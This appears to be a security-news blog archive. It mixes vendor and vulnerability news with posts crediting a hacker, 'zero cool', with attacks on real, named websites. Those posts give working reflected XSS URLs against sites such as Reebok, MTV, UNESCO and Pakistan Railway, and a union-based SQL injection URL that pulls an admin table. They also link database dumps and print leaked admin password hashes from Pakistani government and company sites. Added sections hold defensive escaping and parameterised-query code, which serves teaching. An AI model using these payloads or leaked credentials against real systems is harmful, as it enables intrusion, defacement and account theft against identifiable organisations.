Showing posts sorted by relevance for query Zero.

XSS vulnerability found by zero cool on (reebok, indiagames, mtv, lapdonline, unesco, pcboard)

Reflected XSS found by zero cool on:
reebok.com
bsnl1.indiagames.com
www.lapdonline.org
www.mtv.co.uk
www.pcboard.com.pk
whc.unesco.org
plus an HTML injection on cricket.com.au.

Every proof of concept below puts the same payload into the site's search box. The leading >"> closes the quoted attribute and the tag the search term is echoed into, so the rest of the string (<MARQUEE>, then an <img>, or on Reebok an <iframe>) is parsed as new markup. The marquee and the image are only visible markers: a <script> element would be reflected the same way unless the site filters it, and the malformed <img src="..." img> still renders because browsers tolerate the stray attribute.

reebok.com
Vulnerable link: http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go

bsnl1.indiagames.com
http://bsnl1.indiagames.com/bpremium/index.jsp
Vulnerable input (paste into the search bar): >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

www.lapdonline.org
http://www.lapdonline.org/
Vulnerable link: http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E

www.mtv.co.uk
http://www.mtv.co.uk/
Vulnerable link: http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search

www.pcboard.com.pk
http://www.pcboard.com.pk/
Vulnerable input (paste into the search bar): >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

whc.unesco.org
http://whc.unesco.org/
Vulnerable link: http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=&region=&criteria_restrication=&order=

HTML injection in cricket.com.au, also found by zero cool. Here the image tag in the search path is rendered directly; no attribute break-out prefix is needed:
http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E
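The attribute break-out above, as an added example that is not part of the original post: the MTV proof-of-concept URL from the post is decoded the way the server decodes it, echoed into a search-form template that puts the term into a quoted attribute, and the rendered page is tokenised to list the tags the template never emitted. The template, the escaped variant using html.escape, and the tag check are this example's own assumptions about the target sites, not their code. The same check applies to the UNA Pakistan and Pakistan Railway search boxes further down this page, which reflect the term the same way.

```python
"""Reflected XSS through a search box, and the attribute-context escape that stops it.

The proof-of-concept URLs on the page all send the same term:
>"><MARQUEE>...</MARQUEE><img ...>. The leading >"> closes the quoted
attribute (value="...") and the tag the search term is echoed into, so
everything after it is parsed as new markup. The page template below is an
assumption about the target sites; the URL is the MTV one from the post.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

POC_URL = (
    "http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL"
    "%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png"
    "%22%20img%3E&op=Search"
)


def search_term(url: str) -> str:
    """The value of the injected parameter k, percent-decoded as the server sees it."""
    return parse_qs(urlparse(url).query)["k"][0]


def render_vulnerable(term: str) -> str:
    """Assumed template: the term is echoed back unescaped into a quoted attribute."""
    return f'<form><input name="k" value="{term}"><input type="submit"></form>'


def render_fixed(term: str) -> str:
    """Same template with contextual output encoding: & < > " ' become entities,
    so the term can never terminate the attribute or the tag."""
    safe = html.escape(term, quote=True)
    return f'<form><input name="k" value="{safe}"><input type="submit"></form>'


class _TagCollector(HTMLParser):
    """Records start tags the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page: str, expected=("form", "input")) -> list:
    """Start tags in the rendered page that the template never emitted."""
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return [t for t in collector.tags if t not in expected]


if __name__ == "__main__":
    term = search_term(POC_URL)
    print("decoded term:", term)
    print("vulnerable template injects:", injected_tags(render_vulnerable(term)))
    print("escaped template injects:   ", injected_tags(render_fixed(term)))
```

Against the vulnerable template the check returns the marquee and img tags; against the escaped template it returns nothing, because the term can no longer end the attribute. Escaping has to match the context the value lands in: html.escape is right for element content and quoted attributes, but a term inserted into a JavaScript string, a URL or an unquoted attribute needs a different encoder.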


Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering

Russian antivirus firm Kaspersky Lab has released Kaspersky Linux Mail Security, an anti-spam and anti-malware application that integrates with a range of Linux-based mail servers to filter spam and block malicious attachments. According to Kaspersky, the new spam-fighting features, Reputation Filtering and the Enforced Anti-Spam Updates Service, help filter out zero-hour spam, while its ZetaShield technology is aimed at zero-day and targeted attacks. The product is designed for integration with a range of Linux-based mail systems and is pitched at businesses and ISPs.

Key features (as described by Kaspersky):
  • Advanced antivirus engine: Kaspersky Linux Mail Security includes the latest version of Kaspersky Lab's antivirus engine, with behaviour stream signatures, to detect and remove malicious attachments from incoming email.

  • Zero-Day Exploit and Targeted Attack (ZETA) Shield: Kaspersky's ZetaShield offers protection against unknown malware and exploits, to defend against zero-day and zero-hour attacks and APTs (Advanced Persistent Threats).

Anti-spam engine: Kaspersky Linux Mail Security provides the latest version of Kaspersky's anti-spam engine, including two new technologies:
  • Enforced Anti-Spam Updates Service: uses push technology, directly from the Kaspersky cloud, to deliver real-time updates. By cutting the update window from 20 minutes to approximately 1 minute, it helps defend against zero-hour spam and spam epidemics.
  • Cloud-assisted Reputation Filtering: fights unknown spam, to raise the spam capture rate and reduce false positives.

Kaspersky Security Network: the cloud-based Kaspersky Security Network (KSN) gathers data from millions of participating users' systems around the world to help defend against the latest viruses and malware. Potential threats are monitored and analysed in real time to block dangerous actions before harm is caused.
Attachment filtering: the new Format Recogniser feature filters attachments by file type, name and message size. This helps businesses enforce their email usage policy and addresses the corporate liability that arises when users distribute illegal music or video files through the corporate email system.
Global blacklists and whitelists (improved): in addition to corporate blacklists and whitelists, administrators can manage allowed or denied senders using IPv4 and IPv6 addresses, wildcards and regular expressions.
Personal blacklists and whitelists: users can also create their own blacklists and whitelists.
Backup and personal backup with flexible search: blocked email is quarantined in a backup store. If the system uses Microsoft Active Directory or OpenLDAP, individual users can reach their personal backup via the web, so they are less likely to call the helpdesk.
Integration with the most popular MTAs (Postfix, Sendmail, Exim, qmail and CommuniGate Pro): the integration method depends on the Mail Transfer Agent (MTA), either as a filter or through the Milter API.
Antivirus command-line file scanner: the Kaspersky Anti-Virus On-Demand Scanner can check objects on demand, including directories, regular files and devices such as hard drives, flash drives and DVD-ROMs.
amavisd-new: Kaspersky Linux Mail Security supports integration with Linux mail systems through the high-performance AMaViS interface.
Monitoring and reporting:

  • SNMP (Simple Network Management Protocol) support: any type of event can be monitored using SNMP events and traps
  • A new dashboard gives an at-a-glance view of status and monitoring
  • Detailed, flexible reporting in PDF format, for customisable reports that help in monitoring and analysing security and policies
  • Notification system: informs administrators and document owners about policy violation incidents
  • Detailed logs of all product actions, to help in identifying problems

Easy to deploy, maintain and manage:

  • System administrators can run manual updates or set rules for fully automatic updates of antivirus, anti-spam and ZetaShield
  • Integration with Active Directory and OpenLDAP
  • Rich email traffic management rules: administrators can create rules according to corporate security policies
  • IPv6 support
  • Scalable architecture: the entire system can be migrated from a test server to a production environment
Kaspersky Linux Mail Security supports the following distributions: Red Hat Enterprise Linux 6.2 Server, Fedora 16, SUSE Linux Enterprise Server 11 SP2, Debian GNU/Linux 6.0.4 Squeeze, CentOS 6.2, openSUSE Linux 12.1, Ubuntu 10.04 LTS and 12.04 LTS, Mandriva Enterprise Server 5.2, FreeBSD 8.3 and 9.0, Canaima 3.0, Asianux 4 SP1.






Google Hackers Who Unleashed Hydraq/Aurora Trojan Strike Again

Computer security firm Symantec has revealed that the hacker group which unleashed the Hydraq (Aurora) Trojan horse against Google and 34 other companies in 2009 has also been linked to attacks that compromised systems at defense contractors, human rights organizations and other large organizations. According to Symantec's official blog, the company has been monitoring the group for the last three years and found that the attackers have used a large number of zero-day exploits not only against the intended target organization but also against the supply-chain manufacturers that service the company in their cross hairs. In Symantec's words, the attackers "are systematic and re-use components of an infrastructure we have termed the 'Elderwood Platform'"; the name "Elderwood" comes from the exploit communication used in some of the attacks. The platform lets the group deploy new zero-day exploits quickly. Spear-phishing email has always been the delivery method, but Symantec now sees increased adoption of "watering hole" attacks, which compromise websites the target organization is likely to visit. The overall campaign by this group has been dubbed the "Elderwood Project".
Serious zero-day vulnerabilities, exploited in the wild and affecting a widely used piece of software, are relatively rare; Symantec counts approximately eight in 2011. In the past few months, however, the Elderwood attackers have used four of them. Other attackers also use zero-day exploits (the Sykipot, Nitro and Stuxnet attacks, for example), but Symantec has seen no other group use so many, and the number indicates access to a high level of technical capability. Some of the most recent exploits the group has used:
  •  Adobe Flash Player Object Type Confusion Remote Code Execution Vulnerability (CVE-2012-0779)
  •  Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875)
  •  Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889)
  •  Adobe Flash Player Remote Code Execution Vulnerability (CVE-2012-1535) 
Symantec has published a research paper detailing the links between the exploits used by this group, its method of targeting organizations, and the Elderwood Platform. It puts into perspective the continuing evolution and sheer resilience of the entities behind targeted attacks.








Zero-Day Vulnerability In Flash Patched By Adobe
Yet another zero-day vulnerability has been found in Adobe Flash Player. Earlier, researchers found a Flash Player flaw that let an attacker switch on a victim's webcam remotely, which Adobe later patched, and before releasing Flash Player 11 Adobe issued a new privacy policy and security update; neither has stopped this round. The vulnerabilities fixed now could cause a crash and potentially allow an attacker to take control of the affected system.
Affected Version:- 
  • Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
  • Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Adobe confirmed the issue and released a patch to close the security hole. The same security release also resolves a universal cross-site scripting (UXSS) vulnerability (CVE-2012-0767) that could be used to take actions on a user's behalf on any website or webmail provider if the user visits a malicious website. There are reports that this vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking a malicious link delivered in an email message (Internet Explorer on Windows only). Google's Chrome browser, which bundles Flash directly (unlike competing browsers), also received an update carrying Adobe's fix.
Recommendation From Adobe:-
Adobe recommends that users of Adobe Flash Player 11.1.102.55 and earlier for Windows, Macintosh, Linux and Solaris update to Adobe Flash Player 11.1.102.62. Users of Adobe Flash Player 11.1.112.61 and earlier on Android 4.x should update to Adobe Flash Player 11.1.115.6, and users of Adobe Flash Player 11.1.111.5 and earlier on Android 3.x and earlier should update to Flash Player 11.1.111.6; full details are in Adobe's security bulletin.
Earlier in 2011, another Flash Player bug was found in BlackBerry OS and later fixed by the developer, and last year Adobe closed a serious security hole in Acrobat 9.x and Adobe Reader.




VUPEN Researchers Say They Have the First Zero-Day Exploit for Windows 8 & Internet Explorer 10

The user base of Windows 8, Microsoft's newly launched and so far most advanced Windows operating system, grows every day, and the security threats are growing with it. Recently the French IT security firm VUPEN, known as a controversial bug hunter and exploit seller, claimed to have a zero-day exploit for Windows 8. VUPEN's researchers took credit for defeating the low-level security enhancements featured in Windows 8. A tweet from VUPEN Security's official account said it already has a Windows 8 exploit on offer: "Our first 0day for Win8+IE10 with HiASLR/AntiROP/DEP & Prot Mode sandbox bypass (Flash not needed) is ready for customers. Welcome #Windows8"
Apparently, the exploit chains several unpatched (0-day) security holes in the new version of Windows and the bundled Internet Explorer 10 browser to run code on the system via specially crafted web pages. VUPEN CEO and head of research Chaouki Bekrar also sent out a pair of tweets claiming the first zero-day exploit for Windows 8 and Internet Explorer 10, both released Oct. 26. Bekrar hints that the exploit is a sandbox bypass for IE10 with ASLR, DEP and anti-ROP mitigations enabled. "We welcome #Windows8 with various 0Ds combined to pwn all new Win8/IE10 exploit mitigations," Bekrar wrote.

The exploit allegedly bypasses all of Windows 8's exploit mitigations: for example Address Space Layout Randomization (ASLR), which Microsoft extended in this edition of Windows to cover more system areas and to use more entropy (the "HiASLR" in the tweet). VUPEN claims the exploit also bypasses Data Execution Prevention (DEP), the new anti-ROP mitigations, and Internet Explorer's sandbox-like Protected Mode. A patch for the exploited holes may not arrive in the foreseeable future: VUPEN says it discovered the vulnerabilities itself and does not plan to disclose them to Microsoft. The company offers its exploits only to paying customers, among them government investigation authorities; should Microsoft close the holes, the elaborate exploit would lose much of its value.



-Source (The-H & threatpost)






Zero-Day Vulnerability Found in The Server Monitoring Software of HP

After the HP LaserJet printer firmware scare, another HP product, the Operations Agent server monitoring software, turns out to have serious vulnerabilities. Hewlett-Packard has issued a security advisory to its customers about two flaws in Operations Agent. They were reported to HP by Luigi Auriemma via TippingPoint's Zero Day Initiative (ZDI). According to the company, unspecified errors in the enterprise software for AIX, HP-UX, Linux, Solaris and Windows can be exploited by a remote attacker to compromise a vulnerable system and execute arbitrary code. Both have a CVSS 2.0 (Common Vulnerability Scoring System) base score of 10.0, the highest possible. Note that the bugs went through coordinated disclosure and a fix shipped with the advisory, so "zero-day" here echoes the name of the reporting programme rather than meaning exploitation before a patch existed.
Versions prior to 11.03.12 on all supported platforms are affected; upgrading to 11.03.12 corrects the problems. The full list of affected versions and patch download information are in the company's security advisory. HP advises all administrators to install the patches as soon as possible.






11 High Profile Websites of Pakistan Are Vulnerable, Says Zero; He Also Exposed Databases and Admin Credentials


List of vulnerable sites:

http://www.awt.com.pk/
http://www.unapakistan.org.pk/
www.psf.gov.pk
www.commerce.gov.pk
http://www.whatmobile.com.pk/
http://www.competitiveness.org.pk/
http://www.smeda.org.pk/
http://www.shifa.com.pk/
http://www.gallup.com.pk/
http://www.onlinenews.com.pk/
www.phonebook.com.pk


Here are the details of those sites:

1) Army Welfare Trust of Pakistan, hacked by zero

Hacked page: http://www.awt.com.pk/news_detail.php?news_id=9
Mirror link: http://mirror.sec-t.net/defacements/?id=44797

2) XSS vulnerability in United Nations Association of Pakistan

The search parameter is reflected unescaped; this proof of concept breaks out of the attribute with >"> and pops a script alert rather than injecting visible markup:
http://www.unapakistan.org.pk/search.php?search=%3E%22%3E%3Cscript%3Ealert%28%22ZERO%20WAS%20HERE%22%29%3C/script%3E&section=Whole+Site&x=24&y=1

3) Pakistan Science Foundation is vulnerable to SQL injection

Database dump: http://pastebin.com/XCtn8Ksw

4) Government of Pakistan, Ministry of Commerce, is vulnerable to SQL injection

Recovered admin rows. These are phpass portable hashes in the $P$B form WordPress uses (salted, 2^13 = 8192 MD5 rounds), so a plain hash lookup will not crack them:
admin $P$BCr2kHTn8oXYjZ.z2AabI56aSgo7gs.
khushnaam $P$BtJsGbrR1l0.IYsv9a1tJhwkjMMYO/.

Database dump: http://pastebin.com/WKwP68HC

5) Civil Defence of Pakistan is vulnerable to SQL injection, found by zero
Database dump: http://pastebin.com/HsXvQAGA

6) http://www.shifa.com.pk/ is vulnerable to SQL injection

Database dump: http://pastebin.com/8r2vqqYF

7) http://www.smeda.org.pk/ is vulnerable to SQL injection
Database dump: http://pastebin.com/7Xukb7cH

8) http://www.gallup.com.pk/ is vulnerable to SQL injection

Database dump: http://pastebin.com/3vNLAmry

9) http://www.onlinenews.com.pk/ is vulnerable to SQL injection
Recovered admin rows. These are bare 32-hex digests, almost certainly unsalted MD5, which a rainbow table or online lookup cracks in seconds:
3e8edbe7d481ca8ba452ae92631a905e admin
4bc2cfed02b6bebf99b6646c82cec3b8 admin
Database dump: http://pastebin.com/y7Vt0zSC

10) http://www.whatmobile.com.pk/ is vulnerable to SQL injection

Recovered credentials (the original post printed the plaintext password; it is redacted here):
user: aamir
pass: [redacted]
Database dump: http://pastebin.com/TzTMjKYK

11) http://www.competitiveness.org.pk/ is vulnerable to SQL injection

Vulnerable link. This is a classic union-based injection on a numeric parameter: the negative pageid empties the legitimate result set, the UNION supplies nine columns to match the page's own SELECT, and concat(admin_name,0x3a,admin_password) (0x3a is a colon) is placed in the second column, presumably the one the page renders as content, pulling every admin row out of tbl_admin:

http://www.competitiveness.org.pk/subpage.php?pageid=-21+union+select+1,concat%28admin_name,0x3a,admin_password%29,3,4,5,6,7,8,9+FROM+tbl_admin--
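The competitiveness.org.pk query above, as an added example that is not part of the original post: a toy sqlite3 database with a constructed pages table and tbl_admin, the vulnerable string-built query, and the parameterised version. sqlite3 stands in for MySQL, so concat(admin_name,0x3a,admin_password) is written with ||, and the query has three columns rather than nine; the table contents and the hash value are made up for the demonstration.

```python
"""Union-based SQL injection on a numeric page id, and the bound-parameter fix.

Modelled on the page's proof of concept: a negative id empties the real result
set, and a UNION SELECT with the same column count as the original query
returns admin_name:admin_password in the column the page renders as content.
Schema, rows and the 3-column query are constructed for this example (the
target page's SELECT had 9 columns); sqlite3 stands in for MySQL, so
concat(a,0x3a,b) becomes a || ':' || b.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database with a content table and an admin table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES (21, 'About', 'About this site');
        CREATE TABLE tbl_admin(admin_name TEXT, admin_password TEXT);
        INSERT INTO tbl_admin VALUES ('admin', '$P$BexampleHashOnlyForThisDemo');
    """)
    return con


def page_vulnerable(con: sqlite3.Connection, pageid: str) -> list:
    """The bug: the raw GET value is pasted into the SQL text, so SQL in the
    value is executed as SQL."""
    sql = f"SELECT id, title, body FROM pages WHERE id={pageid}"
    return con.execute(sql).fetchall()


def page_fixed(con: sqlite3.Connection, pageid: str) -> list:
    """Fix: validate the type, then bind the value so it is data, never SQL.
    Binding alone already defeats the payload (the whole string is compared
    to id and matches nothing); the type check gives the caller a clean error."""
    if not pageid.isdigit():
        raise ValueError("pageid must be a non-negative integer")
    sql = "SELECT id, title, body FROM pages WHERE id=?"
    return con.execute(sql, (int(pageid),)).fetchall()


# Same shape as the page's PoC, with 3 columns instead of 9. The attacker finds
# the column count by trial; a mismatch is a SQL error, a match is the admin table.
PAYLOAD = "-21 UNION SELECT 1, admin_name || ':' || admin_password, 3 FROM tbl_admin--"


def demo() -> dict:
    """Run the payload through both versions and return what each produced."""
    con = build_db()
    leaked = page_vulnerable(con, PAYLOAD)
    try:
        page_fixed(con, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked, "normal": page_fixed(con, "21")}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

demo() shows the UNION row surfacing as page content through the vulnerable query, and the same payload rejected by the fixed one. The column count is the part an attacker tunes by trial, which is why the page's proof of concept carries nine literals; with a bound parameter there is nothing to tune, because the value is never parsed as SQL.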

Microsoft shows class in disclosing Google zero-day
Back in June of last year, Tavis Ormandy, a Google engineer in Switzerland, caused quite a stir. As Gregg Keizer reported at the time, Ormandy told Microsoft about a previously unknown security hole in Windows on June 5, and on June 9 he published a full description of the vulnerability, including proof-of-concept code, on the Full Disclosure mailing list.
Microsoft blew a corporate gasket. Mike Reavey, the director of the Microsoft Security Response Center, blogged the following day, "Public disclosure of the details of this vulnerability and how to exploit it, without giving us time to resolve the issue for our potentially affected customers, makes broad attacks more likely and puts customers at risk."
Ormandy responded that he was acting on his own behalf, not as a Google employee, but Reavey didn't buy it. The relationship between Microsoft and Google turned from frosty to frigid.
Last week, Microsoft showed its mettle by publicly issuing a new policy and two new "Microsoft Vulnerability Research Advisories" -- a completely new breed of Microsoft malware-fighting animal.
The policy is a nine-page document saying, basically, that when Microsoft discovers a zero-day flaw in some other vendor's product, Microsoft will work with the vendor to fix the vulnerability -- and make sure it's fixed before telling the world: "If attacks are underway in the wild, and the vendor is still working on the update, then both the finder and vendor work together as closely as possible to provide early public vulnerability disclosure to protect customers."
There are exceptions to the private reporting restriction. The policy allows Microsoft to divulge details if the vulnerability becomes known to the public at large, when there's evidence that the vulnerability is being used, or when the vendor doesn't respond.
That last point has become a bone of contention with several security researchers who claim that Microsoft hasn't responded quickly enough -- or, indeed, hasn't responded at all -- to their reports of Microsoft vulnerabilities. To be fair, no one has yet determined precisely how long it takes for a lack of response to result in a vendor being classified as "unresponsive."
Microsoft accompanied the new procedure with two new MSVR advisories, dubbed MSVR11-001 and MSVR11-002. It comes as no surprise that both of them describe previously undocumented security holes in Google products that had already been patched by Google. (MSVR11-002 describes a problem in both Google Chrome and Opera.)
Neither vulnerability is particularly interesting. The first one, a buffer overflow, allows arbitrary code to run, but only in the confines of the Chrome sandbox. It was fixed in Chrome Version 6.0.472.59, which was released seven months ago. The second requires advance knowledge of a specific local IP address. It was fixed in Chrome 8.0.552.215, which was released four months ago. Apparently, Microsoft held onto both reports, pending final publication of their new policy.
If you or someone in your organization ever stumbles on a zero-day vulnerability in a software product, take a few minutes to look over Microsoft's policy. I won't get sucked into debating the virtues of Full Disclosure versus Coordinated Disclosure, but it would certainly be instructive to see how Microsoft says it would treat you and your organization if the shoe were on the other foot.


Egyptian Hacker Selling Zero-day Exploit of Yahoo Mail For $700

Anyone who frequents underground hacker communities knows that botnets, zero-day exploits, the Black Hole exploit kit, malware, undisclosed vulnerabilities and the like are sold there at various prices, generally between $5 and $500. Today's item is a pricier product at the top of the black market: a new cross-site scripting exploit that lets attackers steal cookies and get into Yahoo! email accounts. According to Krebs on Security, a zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious websites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, offered for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a cross-site scripting (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users; such a flaw would let attackers send or read email from the victim's account. In a typical reflected XSS attack, the attacker sends a malicious link to an unsuspecting user; if the user clicks it, the injected script runs in the site's origin and can read cookies, session tokens or other sensitive information the browser holds for that site, and it can rewrite the content of the HTML page. The hacker posted a video to demonstrate the exploit to potential buyers.


“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!”
In response Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from watching the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”
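What the cookie attributes change about the theft described above, as an added example that is not part of the original post: a small Set-Cookie parser and an audit of three constructed headers (none of them Yahoo's real cookies) for the attributes that limit what an injected script can take.

```python
"""Set-Cookie audit: which attributes limit what an XSS payload can do with a cookie.

A script injected into a page can read document.cookie unless the cookie is
flagged HttpOnly; without Secure the cookie also travels over plain HTTP, and
without SameSite it rides along on cross-site requests. The headers below are
constructed for this example.
"""

WEAKNESSES = {
    "httponly": "no HttpOnly: readable by injected script through document.cookie",
    "secure": "no Secure: sent in clear over plain HTTP",
    "samesite": "no SameSite=Lax/Strict: attached to cross-site requests",
}

SAMPLE_HEADERS = [  # constructed, not real Yahoo headers
    "Set-Cookie: sess=8f1c2a; Domain=.mail.example; Path=/",
    "Set-Cookie: sess=8f1c2a; Domain=.mail.example; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: theme=dark; Path=/; Secure",
]


def parse_set_cookie(header: str):
    """Split one Set-Cookie header (with or without the 'Set-Cookie:' prefix)
    into (cookie name, {attribute name lower-cased: value})."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    pairs = [p.strip() for p in header.split(";") if p.strip()]
    name = pairs[0].split("=", 1)[0].strip()
    attrs = {}
    for pair in pairs[1:]:
        key, _, value = pair.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def cookie_findings(header: str):
    """Return (name, [weakness descriptions]) for one Set-Cookie header."""
    name, attrs = parse_set_cookie(header)
    issues = []
    if "httponly" not in attrs:
        issues.append(WEAKNESSES["httponly"])
    if "secure" not in attrs:
        issues.append(WEAKNESSES["secure"])
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append(WEAKNESSES["samesite"])
    return name, issues


def audit(headers) -> list:
    """One (name, issues) entry per header, in order; an empty list means all
    three attributes are present."""
    return [cookie_findings(h) for h in headers]


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_HEADERS):
        print(name, "->", "ok" if not issues else "; ".join(issues))
```

A cookie without HttpOnly is readable from document.cookie by any script running in the page, which is what a stored XSS like the one on sale would use to copy it out to the attacker. HttpOnly narrows the damage rather than closing it: script in the page can still issue requests that carry the cookie, so it can read or send mail in-page even when it cannot carry the cookie elsewhere. Fixing the injection is the actual remedy, which is the point Martinez makes below.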






Zero-Day Vulnerability in "Cloud" Revealed at TakeDownCon
 
Almost every IT company across the globe is adopting "cloud" technology to store large amounts of data while reducing cost, and many of them assume that because the data is stored offsite it is securely preserved and they no longer have to worry about the risk. That assumption was challenged when a speaker at TakeDownCon described a zero-day vulnerability he found in a cloud platform. "Au contraire. Risk cannot be outsourced," says professional ethical hacker Dave Chronister of Parameter Security (St. Louis, MO). Chronister went on to say, "It's because of this mindset that hackers are preying upon the cloud and are gaining control of huge stores of information through a single attack," which is exactly what he recently did: "During a recent cloud security audit, I was able to identify a zero day exploit and within minutes gained access to the cloud sphere and every system that was on that cloud—giving me complete control. Needless to say, the client was shocked because they were touting their cloud offering as 100% secure."
Bringing his real-world cloud hacking experience to TakeDownCon in Dallas in May, Chronister's presentation, The Cloud is a Smoke Screen, aims to expose the false sense of security that cloud providers and users possess. Specifically, the presentation will:
  • Expose various cloud vulnerabilities
  • Address cloud security issues
  • Provide insight into selecting cloud providers and questions to ask with regards to data security, risk and incident response
  • Offer ways to successfully implement your own cloud solution and mitigate risk
  • Share his real-world experiences hacking multiple cloud environments
  • And much more


-Source (TechDown)




non-persistent xss vulnerability in Pakistan Railway's site



non-persistent xss vulnerability in www.pakrail.com found by zero cool.


Vulnerable link. The txtsearch parameter is reflected unescaped; the payload closes the attribute with >"> and then injects an entire page body: an external image, inline JavaScript that types out the message character by character, and a remote StatCounter script. That makes this script execution in pakrail.com's origin, not just markup injection, even though the post only calls it "non-persistent xss".

http://www.pakrail.com/search.php?txtsearch=%3E%22%3E%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3CBODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22document.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fjavascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28document.getElementById%29+{+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%29+{+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+mytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+}+}++function+typeit%28%29+{+mytext+%3D+mytext.replace%28%2F%3C%28[^%3C]%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from+text+if%28it+%3C+mytext.length%29+{+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+}+}+%3C%2Fscript%3E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fcounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%3D%22hit+counter%22+